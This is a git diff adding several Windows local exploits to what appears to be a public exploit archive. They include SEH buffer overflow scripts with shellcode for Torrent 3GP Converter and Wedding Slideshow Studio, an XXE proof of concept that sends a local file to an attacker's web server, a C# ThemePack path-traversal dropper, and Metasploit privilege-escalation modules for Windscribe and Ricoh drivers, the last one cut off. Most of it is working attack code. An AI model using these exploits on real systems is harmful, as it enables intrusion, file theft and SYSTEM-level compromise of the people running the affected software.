@@ -0,0 +1,132 @@
+# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
+# Exploit Author: boku
+# Date: 2020-01-24
+# Software Vendor: torrentrockyou
+# Vendor Homepage: http://www.torrentrockyou.com
+# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
+# Version: Torrent 3GP Converter Version 1.51 Build 116
+# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
+# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
+# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
+# Recreate:
+#  1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
+#  2) run python script & open created 'crash.txt' file
+#  3) select-all > copy-all
+#  4) in app, click 'Register' on the bottom
+#  5) in 'Name:' textbox enter 'a'
+#  6) in 'Code:' textbox paste buffer
+#  7) click 'OK', calculator will open & app will crash
+
+#!/usr/bin/python
+
+# Bad Chars 
+# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer
+# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper
+# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper
+# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e
+# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6
+# \xf8-\xfe => \xd8-\xde # \xff => \x9f
+# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
+# Max shellcode size is 2384  bytes
+# - First 2384 bytes of our buffer is left unmangled on the stack
+# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
+# x86/alpha_upper chosen with final size 447
+# Payload size: 447 bytes
+## msfvenom x86/alpha_uppers GetPC Routine ##
+#  [!] Does not work because of the bad chars!
+# Manually replaced with a working version of GetPC for this exploit
+# 89E5            mov ebp, esp
+shellcode = b'\x54\x5D' # push esp # pop ebp
+# DBCD            fcmovne st, st(5)
+shellcode += b'\x89\xCF' # mov edi, ecx
+# D975 F4         fstenv [ebp-C]
+shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop
+# 5F              pop edi  
+shellcode += b'\x90' # nop
+shellcode += b"\x57\x59\x49"
+shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
+shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
+shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
+shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
+shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
+shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"
+shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"
+shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"
+shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"
+shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"
+shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"
+shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"
+shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"
+shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"
+shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"
+shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"
+shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"
+shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"
+shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"
+shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
+shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"
+shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"
+shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"
+shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"
+shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"
+shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"
+shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"
+shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"
+shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"
+shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"
+shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"
+shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"
+shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"
+shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"
+shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"
+shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"
+shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"
+shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"
+shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"
+shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"
+# Stack EggHunter for fun & profit 
+egg = 'BOKU'
+hunterOS = '\x41'*(2784-len(egg+egg+shellcode))
+# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
+hunter  = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
+hunter  += '\x5B' # pop ebx / EBX=PC
+hunter  += '\x80\x43\x29\x20'     #   add byte [ebx+41], 0x20 / 20+55=7F=jnz
+hunter  += '\x80\x43\x33\x20'     #   add byte [ebx+51], 0x20 / 20+55=7F=jnz
+hunter  += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55
+hunter  += '\x54' # push esp
+hunter  += '\x59' # pop ecx
+hunter  += '\x90'*18 # nop fillers for jnz short -7 loop
+hunter  += '\x49' # dec ecx
+hunter  += '\x3B\x01' # cmp eax, [ecx]
+hunter  += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars
+hunter  += '\x51' # push ecx
+hunter  += '\x5a' # pop edx
+hunter  += '\x4a'*4 # dec edx * 4 / check if second egg matchs
+hunter  += '\x3B\x02' # cmp eax, [edx]
+hunter  += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars
+hunter  += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs
+hunter  += '\x31\xd2' # xor edx,edx
+hunter  += '\x52' # push edx
+hunter  += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b
+hunter  += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44
+hunter  += '\xC6\x04\x24\x39'     # mov byte [esp],0x39
+# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
+#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)
+hunter  += '\xc3' # ret
+huntRmdr = '\x41'*(88-len(hunter))
+nsehOS   = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
+nSEH     = '\x83\xC4\x04\xC3'     # add esp,byte +0x4 # ret
+# 3-byte SEH overwrite using the truncating Null byte
+SEH      = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] 
+         # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} 
+
+payload  = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH
+
+try:
+    f=open("crash.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/local/47974.txt b/exploits/windows/local/47974.txt
new file mode 100644
index 000000000..0620a4f96
--- /dev/null
+++ b/exploits/windows/local/47974.txt
@@ -0,0 +1,62 @@
+# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
+# Exploit Author: Javier Olmedo
+# Date: 2018-11-14
+# Vendor: XMLBlueprint XML Editor
+# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
+# Affected Version: 16.191112 and before
+# Patched Version: unpatched
+# Category: Local
+# Platform: XML
+# Tested on: Windows 10 Pro
+# CWE: https://cwe.mitre.org/data/definitions/611.html
+# CVE: 2019-19032
+# References:
+# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/
+ 
+# 1. Technical Description
+# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
+# Injection vulnerability through the malicious XML file. This allows a malicious user
+# to read arbitrary files.
+ 
+# 2. Proof Of Concept (PoC)
+# 2.1 Start a webserver to receive the connection.
+
+python -m SimpleHTTPServer 80
+
+# 2.2 Upload the payload.dtd file to your web server.
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
+%all;
+
+# 2.3 Create a secret.txt file with any content in desktop.
+
+# 2.4 Open poc.xml and click XML -> Validate
+
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
+<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+# 2.5 Your web server will receive a request with the contents of the secret.txt file
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
+192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
+
+# 3. Timeline
+# 13, november 2019 - [RESEARCHER] Discover
+# 13, november 2019 - [RESEARCHER] Report to vendor support
+# 14, november 2019 - [DEVELOPER]  Unrecognized vulnerability
+# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
+# 22, november 2019 - [RESEARCHER] Public disclosure
+
+# 4. Disclaimer
+# The information contained in this notice is provided without any guarantee of use or otherwise.
+# The redistribution of this notice is explicitly permitted for insertion into vulnerability
+# databases, provided that it is not modified and due credit is granted to the author.
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
\ No newline at end of file
diff --git a/exploits/windows/local/47975.c b/exploits/windows/local/47975.c
new file mode 100644
index 000000000..814ea415a
--- /dev/null
+++ b/exploits/windows/local/47975.c
@@ -0,0 +1,147 @@
+# Exploit Title: Microsoft Windows 10 - Theme API 'ThemePack' File Parsing
+# Google Dork: n/a
+# Date: 2020-10-28
+# Exploit Author: Eduardo Braun Prado
+# Vendor Homepage: http://www.microsoft.com/
+# Software Link: http://www.microsoft.com/
+# Version: 10 v.1803 (17134.407)
+# Tested on: Windows 7, 8.0, 8.1, 10, Server 2012, Server 2012 R2, Server 2016, Server 2019
+# CVE : CVE-2018-8413
+# Discovered by: Eduardo Braun Prado
+
+[Details]
+
+Microsoft 'themepack' files are classic '.theme' files compressed for
+sharing over the internet. Theme files
+allows users to customize visual aspects of their device, such as icons
+for known features like 'My computer'
+and 'trash bin' folders, the default screensaver (which by the way
+allowed attackers to run '.scr' files located
+on shares upon applying a Theme, in the past. Refer to: CVE-2013-0810).
+ThemePack file type uses Microsoft 'CAB' format. The parser contains a
+vulnerability that allows attackers
+to create arbitrary files on arbitrary locations on the user´s system,
+by using the classic
+'parent directory' technique, and thus could lead to creation of some
+executable files on the
+startup folder. This executable will be run on next logon.
+
+
+Conditions:
+
+
+1) The 'themepack' file must contain a valid '[dot] theme' file.
+
+
+The parser allows creating '.theme' files on arbitrary locations, but
+the extension must be
+'.theme'. There´s a trick, though, to overcome this:
+
+NTFS Alternate Data Streams.
+
+By using a specially crafted name like "abc.hta:[dot] theme" it´s
+possible to trick the parser into
+dropping a file with an '[dot] hta' extension instead of the legitimate
+'[dot] theme', potentially allowing
+attackers to compromise the affected systems. The '[dot] hta' extension
+is a good choice since you can
+merge valid code with arbitrary text or binary files.
+
+Note: Patched on October, 2018 Microsoft monthly patch.
+
+
+[PoC]
+
+Proof of concept code that drops an 'hta' file to startup dir.
+
+
+Instructions:
+
+ - Create a new project on MS Visual Studio (any version, included free
+ones like 'Express'), choose 'Console Application'
+
+and at 'program . cs' replace the code with the code below
+
+Note: Source code targets dot NET 4.0 and up (previous versions might
+work fine though!)
+
+
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace ThemePack
+{
+    class Program
+    {
+        static void Main(string[] args)
+        {
+            String exeDir = AppDomain.CurrentDomain.BaseDirectory;
+            Directory.SetCurrentDirectory(exeDir);
+
+            string tmpPath = Path.GetTempPath();
+
+            string tpd =
+"4D53434600000000AB010000000000002C000000000000000301010001000000000000009500000001000100930100000000000000003C508108200061612E2E5C2E2E5C2E2E5C2E2E5C2E2E5C2E2E5C726F616D696E675C6D6963726F736F66745C77696E646F77735C7374617274206D656E755C70726F6772616D735C737461727475705C6162632E6874613A2E7468656D6500B60133780E019301434B4D51C16A023110BD07F20F5EBC5A85D2163405DDB5871645CCB215BA1ED265C0E024B364E261FDFA66534BBD8499F7DE4CDE4BE68B5374F82AC55775020747294ACB1D9A7E6B1CA88CED4C7B1ED517F4522459413E06C2D1CE78C0A6043E47EAD2D8A741EC4C074149515984FF7E7A47EAD823A85982762646085EE5A5B5E58BC14CF231732735D63D47707BA2386E02305D420BDCC4C112374B08948F8963CE7352148474BB614BC119CC8014DA5EFF90A1BC09EDD5444B3ED76A7A785A3D3FAE5EDE8AE43E18CF9D09E0DB5ECD06B5EB88ED201EDA3BAF3504CEE834A7F84E56937B5DECB77A59AF27EBC3FA37DEC6A424213FA60684365248BA4DA537AA5CAEDECB8F4A8AF9E2E1F6133F";
+     
+           string tpf = exeDir + "\\C00L.themepack";
+
+            Console.WriteLine("\n\n
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+\n Microsoft Windows Theme API 'ThemePack' File Parsing Vulnerability
+PoC (CVE-2018-8413)  \n\n by: Eduardo Braun Prado \n\n
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++");
+
+            StreamWriter s = File.CreateText(tmpPath + "\\themepack000.h");
+
+            s.Write(tpd);
+          
+            s.Close();
+
+            FileStream f = File.OpenRead(tmpPath + "\\themepack000.h");
+
+            String ax = "";
+
+
+            byte[] b = new byte[f.Length];
+
+            UTF8Encoding temp = new UTF8Encoding(false);
+
+            while (f.Read(b, 0, b.Length) > 0)
+            {
+                ax = ax + temp.GetString(b);
+            }
+
+
+            String bx = ax.ToString();
+            String cx = "";
+
+            byte[] b02 = new byte[f.Length / 2];
+            for (int i = 0; i < f.Length; i += 2)
+            {
+                cx = bx.Substring(i, 2);
+                b02[i / 2] = Convert.ToByte(cx, 16);
+            }
+
+            File.WriteAllBytes(tpf, b02);
+
+            if (File.Exists(tpf))
+            {
+                long fsize = new FileInfo(tpf).Length;
+
+                if (fsize != 0)
+                {
+                    Console.WriteLine("\n\n\n Done! 'C00L." +
+"themepack' file created in the current directory. Vulnerable systems
+should plant an HTA on startup dir.");
+                }
+
+            }
+
+
+            }
+            }
+            }
\ No newline at end of file
diff --git a/exploits/windows/local/48009.txt b/exploits/windows/local/48009.txt
new file mode 100644
index 000000000..28e3ec2cb
--- /dev/null
+++ b/exploits/windows/local/48009.txt
@@ -0,0 +1,25 @@
+#Exploit Title: ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-05
+#Vendor : ELAN Microelectronics
+#Vendor Homepage : http://www.emc.com.tw/
+#Tested on OS: Windows 10 v1803
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ETDService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: ETDService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Elantech\ETDService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Elan Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48021.rb b/exploits/windows/local/48021.rb
new file mode 100755
index 000000000..e25c314b5
--- /dev/null
+++ b/exploits/windows/local/48021.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Services
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
+      'Description'    => %q{
+        The Windscribe VPN client application for Windows makes use of a
+        Windows service `WindscribeService.exe` which exposes a named pipe
+        `\\.\pipe\WindscribeService` allowing execution of programs with
+        elevated privileges.
+
+        Windscribe versions prior to 1.82 do not validate user-supplied
+        program names, allowing execution of arbitrary commands as SYSTEM.
+
+        This module has been tested successfully on Windscribe versions
+        1.80 and 1.81 on Windows 7 SP1 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Emin Ghuliev', # Discovery and exploit
+        'bcoles'        # Metasploit
+      ],
+      'References'     =>
+        [
+          ['CVE', '2018-11479'],
+          ['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'],
+          ['URL', 'https://pastebin.com/eLG3dpYK']
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => '2018-05-24',
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
+  end
+
+  def service_exists?(service)
+    srv_info = service_info(service)
+
+    if srv_info.nil?
+      vprint_warning 'Unable to enumerate Windows services'
+      return false
+    end
+
+    if srv_info && srv_info[:display].empty?
+      return false
+    end
+
+    true
+  end
+
+  def write_named_pipe(pipe, command)
+    kt = "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    kt << "\x00\x00\x00\x00"
+    kt << [command.force_encoding('UTF-8').codepoints.map { |c| "%04X" % c }.join].pack('H*')
+    kt << "\x00" * (32_005 - kt.length)
+
+    print_status "Sending #{command} to #{pipe} ..."
+
+    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0, nil, 'OPEN_EXISTING', 0, nil)
+    handle = r['return']
+
+    if handle == 0xffffffff # INVALID_HANDLE_VALUE
+      print_error "Invalid handle. #{pipe} named pipe not found, or already opened"
+      return false
+    end
+
+    vprint_good("Opended #{pipe}! Proceeding ...")
+
+    begin
+      w = client.railgun.kernel32.WriteFile(handle, kt, kt.length, 4, nil)
+      if w['return'] == false
+        return false
+      end
+    ensure
+      session.railgun.kernel32.CloseHandle(handle)
+    end
+
+    true
+  rescue
+    false
+  end
+
+  def check
+    service = 'WindscribeService'
+
+    unless service_exists? service
+      return CheckCode::Safe("Service '#{service}' does not exist")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_system?
+      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
+    end
+
+    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
+    payload_exe = generate_payload_exe
+    vprint_status "Writing payload (#{payload.encoded.length} bytes) to #{payload_path} ..."
+    write_file payload_path, payload_exe
+    register_file_for_cleanup payload_path
+
+    unless write_named_pipe("\\\\.\\pipe\\WindscribeService", payload_path)
+      fail_with Failure::Unknown, 'Failed to write to pipe'
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/48028.py b/exploits/windows/local/48028.py
new file mode 100755
index 000000000..f945f95f8
--- /dev/null
+++ b/exploits/windows/local/48028.py
@@ -0,0 +1,51 @@
+#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-09
+#Vendor Homepage : http://www.wedding-slideshow-studio.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "poc.txt".
+#2. Just copy the text inside "poc.txt".
+#3. Start the program. In the new window click "Help" > "Register ...
+#4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok"
+#5. The calculator runs successfully
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 1608
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10023b8a)
+#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll] 
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("poc.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/48036.rb b/exploits/windows/local/48036.rb
new file mode 100755
index 000000000..9665f9b50
--- /dev/null
+++ b/exploits/windows/local/48036.rb
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ricoh Driver Privilege Escalation',
+      'Description'    => %q(
+        Various Ricoh printer drivers allow escalation of
+        privileges on Windows systems.
+
+        For vulnerable drivers, a low-privileged user can
+        read/write files within the `RICOH_DRV` directory
+        and its subdirectories.
+
+        `PrintIsolationHost.exe`, a Windows process running
+        as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+        during the installation of a printer. A user can
+        elevate to SYSTEM by writing a malicious DLL to
+        the vulnerable driver directory and adding a new
+        printer with a vulnerable driver.
+
+        This module leverages the `prnmngr.vbs` script
+        to add and delete printers. Multiple runs of this
+        module may be required given successful exploitation
+        is time-sensitive.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+                            'Alexander Pudwill',  # discovery & PoC
+                            'Pentagrid AG',       # PoC
+                            'Shelby Pace'         # msf module
+                          ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-19363'],
+          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Platform'       => 'win',
+      'Payload'        =>
+      {
+      },
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        =>
+        [[
+            'Windows', { 'Arch'  => [ ARCH_X86, ARCH_X64 ] }
+        ]],
+      'Notes'          =>
+      {
+        'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
+        'Reliability' =>  [ UNRELIABLE_SESSION ],
+        'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
+      },
+      'DisclosureDate' => "Jan 22 2020",
+      'DefaultTarget'  => 0
+    ))
+
+    self.needs_cleanup = true
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+    ])
+  end
+
+  def check
+    dir_name = "C:\\ProgramData\\RICOH_DRV"
+
+    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
+    driver_names = dir(dir_name)
+
+    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
+
+    vulnerable = false
+    driver_names.each do |driver_name|
+      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
+      next unless directory?(full_path)
+      @driver_path = full_path
+
+      res = cmd_exec("icacls \"#{@driver_path}\"")
+      next unless res.include?('Everyone:')
+      next unless res.match(/\(F\)/)
+
+      vulnerable = true
+      break
+    end
+
+    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable
+
